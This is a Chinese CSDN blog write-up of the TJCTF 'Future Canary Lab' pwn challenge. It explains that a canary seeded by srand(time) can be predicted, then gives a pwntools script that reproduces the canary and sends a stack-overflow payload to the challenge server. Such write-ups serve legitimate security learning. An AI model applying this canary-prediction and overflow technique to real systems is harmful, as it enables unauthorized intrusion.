TJCTF之Future Canary Lab

最新推荐文章于 2023-05-28 12:24:59 发布
最新推荐文章于 2023-05-28 12:24:59 发布
阅读量227 收藏
点赞数
分类专栏: exploit pwn Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010334666/article/details/82501858
版权
Linux 同时被 3 个专栏收录
15 篇文章 0 订阅
订阅专栏
pwn
10 篇文章 0 订阅
订阅专栏
exploit
8 篇文章 0 订阅
订阅专栏

博客已经转移

https://noone-hub.github.io/

题目原以为很简单,然后做起来才发觉自己这个知识点又不知道,srand函数是按照特定算法计算出seed来的,题目用的是当前时间,也就是说我们连接上他服务器,然后这时候生成的seed跟他就一样了,然后rand也就得出来了,题目不难,就是一个知识点,看wp后自己写的代码贴上

 

#!/usr/bin/env python
# coding=utf-8
from pwn import *
import time
import subprocess

while True:
    io=remote('problem1.tjctf.org',8000)
    seed=int(time.time())
    myio=process(argv=['rand',str(seed)],executable='./rand')
    s=myio.recv()
    srand=[]
    for i in s:
        srand=s.split('\n')
    srand=srand[:-1]
    cookie=''.join([p32(int(x)) for x in srand])
    print cookie
    #p32(0x0) replace j A*64 replace gets-array 
    #address=hex(0xFFFFFFFF+1-0xdeadbeef+0xA)
    payload= "A" * 64 +cookie +p32(0x0)+p32(0x2152411b)
    log.info('Payload : ' + payload)
    io.sendlineafter("What is your name?\n",payload)
    log.success(io.recv())
    c=raw_input("Please input anykey")

 

NoOneGroup
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tjctf2018部分题解
木槿华年的博客
08-17 769
本文由多位大佬的题解整理而来,仅供学习参考 RC4获得了L - 40分 Alphabet = #_23456789abcdefghijklmnopqrstuvwxyz Key = pq_xc589r3nb#mgjtkh7w2dlfvy4eaoi6uzs 密文:wpwt#5ng4_qbitp#8mq59r_g866c4t59c6vy6tisj4af6bprfnbd_wrq2wjmr4ld_s...
2018 moeCTF新生题-----一个菜鸟的部分WP
qq_42192672的博客
10-18 2692
嗯嗯,毕竟我还是个信息安全的小菜鸟,就去看看题目练练手,一起加油吧                                                             MISC BASE64: 这题顾名思义我就去用base64解码了呢 bingo:moectf{b@se64_1s_a_ImPorT@ant_coded_format}   凯撒密码: 啊咧,走了...
[tjctf 2023] crypto,pwn,rev部分
weixin_52640415的博客
05-28 1621
三块没有一个通关的。rev差两个,crypto.pwn都差一题。
TJCTF之Bad Cipher
NoOneGroup
09-02 339
博客已经转移 https://noone-hub.github.io/ 经过两三天的看代码,学会了好多python语法,懂了好多python的东西,特此来记录下,不过通过题目学习到的更多是一种思维,还得多谢大佬的writeup,一边看一边问,大佬已经没耐心了,然后自己琢磨发觉大佬的writeup也出了点小瑕疵,特此记录下吧。 因为现在刚完成的是后面一道题,所以先发下后面一道题的思路 题目有...
2019年CTF4月比赛记录(二):“掘安杯”、TJCTF部分Web题目writeup与重解
極品━═☆宏的博客
04-14 2267
写在前面的: 这次比赛总体上还好吧,虽然并没有做出特别多的题目,只有8道,但是经过这个比赛,包括后面的复现,还是能学到点东西的,对自己而言也算是一种提升吧。起码相较于两个月前还是能感觉到自己的进步的。 具体的writeup官方也给出来了,我只在这里写出自己的做题记录,可能有的比较复杂,还望见谅。 比赛时间:2019年4月6日 复现时间:2019年4月8日 一、Writeup:(基本上是密码、MIS...
TJCTF 2022 Forenscis
wha1e的博客
05-18 268
TJCTF 2022 Forenscis
HttpCanary_3.3.6.zip
04-29
HttpCanary是一款强大的网络封包分析工具,专为Android用户设计,用于监控和抓取应用程序与服务器之间的HTTP和HTTPS通信。在标题“HttpCanary_3.3.6.zip”中,我们可以推断出这是HttpCanary软件的一个特定版本,即...
HttpCanary.pem证书
07-26
安装HttpCanary之后,需要安装证书,有些手机需要在设置里自行安装,需要导入此文件进行安装。
httpcanary 小黄鸟
07-10
httpcanary 小黄鸟 安卓抓包工具
httpcanary9.2.8.1.apk
08-21
Httpcanary破解版是一款主打安卓手机抓包功能的应用。可以帮你快捷的在手机上进行抓包应用,丰富的工具给你更好的体验,该版本已经全面解锁高级专业版功能,给你带来更好的体验。
HttpCanary高级版.apk
11-28
HttpCanary高级版
tjctf-2015:TJCTF 2015 的文章
06-03
TJCTF - in/s/ane 问题解决方案,由 in/s/ane 团队在挑战赛期间。 我们排名第二。
TJCTF之Online Banking
NoOneGroup
09-13 261
博客已经转移 https://noone-hub.github.io/ 又get到新知识,可以,记录下, 先查看c代码 #include <stdio.h> #include <stdlib.h> #include <string.h> #define PIN_SIZE 4 #define NAME_SIZE 32 int verify_pin(ch...
一道socket题目引发的思考
有心好书
04-21 3243
题目及分析题目 客户端通过键盘录入用户名。 服务端对这个用户名进行校验。 如果该用户存在,在服务端显示xxx,已登陆。 并在客户端显示 xxx,欢迎光临。 如果该用户不存在,在服务端显示xxx,尝试登陆。 并在客户端显示 xxx,该用户不存在。 最多就登录三次。 【错误】答案1客户端:package com.ht.zuoye12;import java.io.
TJCTF之Bricked Binary
NoOneGroup
11-17 167
博客已经转移 https://noone-hub.github.io/ 毕竟TJCTF非常适合入门,所以每一道题我都拿来练习下,get到新的知识点 hint: Written byevanyeyeye Earlier, I input my flag to thisimageand received 22c15d5f23238a8fff8d299f8e5a1c62 as the o...
通过fork进程爆破canary
weixin_30763455的博客
05-31 738
1.1.1 通过fork进程爆破canary ⑴.原理分析: 对fork而言,作用相当于自我复制,每一次复制出来的程序,内存布局都是一样的,当然canary值也一样。那我们就可以逐位爆破,如果程序GG了就说明这一位不对,如果程序正常就可以接着跑下一位,直到跑出正确的canary。 另外有一点就是canary的最低位是0x00,这么做为了防止canary的值泄漏。比如在canary上面是...
TJCTF之Secure Secrets
NoOneGroup
09-11 348
博客已经转移 https://noone-hub.github.io/ 百度你查的到的writeup都是说很简单,然后给代码,对于我等新手很不友好,谷歌搜索可以搜索到详细的writeup,也是解释的一半一半,对于新手也不是很友好,看了个youtube的视频,发觉讲的不错,代码简洁,最后懂了,不过就是全英文的,有点难听懂 回到正题:这道题可以用ida打开,审查代码发觉有格式化字符串漏洞,或者自...
逆向入门系列(2)静态分析工具ida的使用
NoOneGroup
08-28 8141
博客已经转移 https://noone-hub.github.io/ 首 先,ida的下载这个自己可以吧,不会的可以找我要ida6.8版本跟7.0版本,我只有这两个版本,6.8兼容32和64位系统,7.0只兼容64位系统,本文用的是6.8,在linux下,我用wine运行的打开ida后通常是这个界面,点击new 找到你要的文件,linux下的elf文件要选择all files才能找到...
ctf 简单pwn题资源
最新发布
08-09
CTF 简单 PWN 题资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单题目。这些题目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取题目提供的关键信息或获取系统控制权。 CTF 简单 PWN 题目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 题目,从初学者到专业选手都能找到适合自己水平的题目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 题目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN 解题技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 题目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用题目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值